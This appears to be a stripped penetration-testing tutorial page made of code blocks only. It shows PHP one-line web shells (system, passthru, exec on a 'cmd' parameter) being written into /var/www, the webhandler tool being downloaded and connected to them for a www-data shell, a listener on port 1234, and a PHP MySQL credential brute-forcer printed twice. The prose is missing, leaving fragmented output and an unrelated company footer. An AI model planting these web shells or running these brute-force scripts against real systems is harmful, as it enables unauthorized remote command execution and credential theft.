1
2
3
|
<?php system($_GET[‘cmd’]); ?>
<?php passthru($_REQUEST[‘cmd’]); ?>
<?php echo exec($_POST[‘cmd’]); ?>
|
1
2
3
4
5
|
root@Dis9Team:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip
root@Dis9Team:/pen/door# unzip webhandler.zip
root@Dis9Team:/pen/door# cd webhandler
root@Dis9Team:/pen/door/webhandler# apt-get install python-setuptools
root@Dis9Team:/pen/door/webhandler# easy_install argparse
|
1
|
root@ubuntu:/var/www# echo ‘<?php system($_GET['cmd']); ?>’ > /var/www/get.php
|
1
|
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –url http://5.5.5.3/get.php?cmd=
|
1
2
3
|
www-data@5.5.5.3:~(/var/www):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@5.5.5.3:~(/var/www):$
|
1
|
root@ubuntu:/var/www# echo ‘<?php echo exec($_POST['cmd']); ?>’ > post.php
|
1
|
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –url http://5.5.5.3/post.php –method POST –parameter cmd
|
| '_ / _
| |/ _ ‘__|
1
2
3
|
5.5.5.3@Unknow:~(Unknown):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
5.5.5.3@Unknow:~(Unknown):$
|
1
|
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py –listen 1234
|
1
|
root@5.5.5.3:~(/var/www):$
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
#!/usr/bin/env php
<?php
error_reporting(0);
$host = “127.0.0.1″;
$user_dict = “wordlist.txt”;
$pass_dict = “wordlist.txt”;
$userFile = file($user_dict);
$passFile = file($pass_dict);
$success;
foreach ($userFile as $user) {
if ($success == 1) {
break;
}
foreach ($passFile as $pass) {
$user = trim($user);
$pass = trim($pass);
$connection = mysql_connect($host, $user, $pass);
if ($connection) {
echo “success:” . $user . “:” . $pass . “n”;
$success = 1;
mysql_close($connection);
break;
}
}
}
?>
#!/usr/bin/env php
<?php
error_reporting(0);
$host = “127.0.0.1″;
$user_dict = “wordlist.txt”;
$pass_dict = “wordlist.txt”;
$userFile = file($user_dict);
$passFile = file($pass_dict);
$success;
foreach ($userFile as $user) {
if ($success == 1) {
break;
}
foreach ($passFile as $pass) {
$user = trim($user);
$pass = trim($pass);
$connection = mysql_connect($host, $user, $pass);
if ($connection) {
echo “success:” . $user . “:” . $pass . “n”;
$success = 1;
mysql_close($connection);
break;
}
}
}
?>
|
1
|
5.5.5.3@Unknow:~(Unknown):$ @brute ftp
|
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号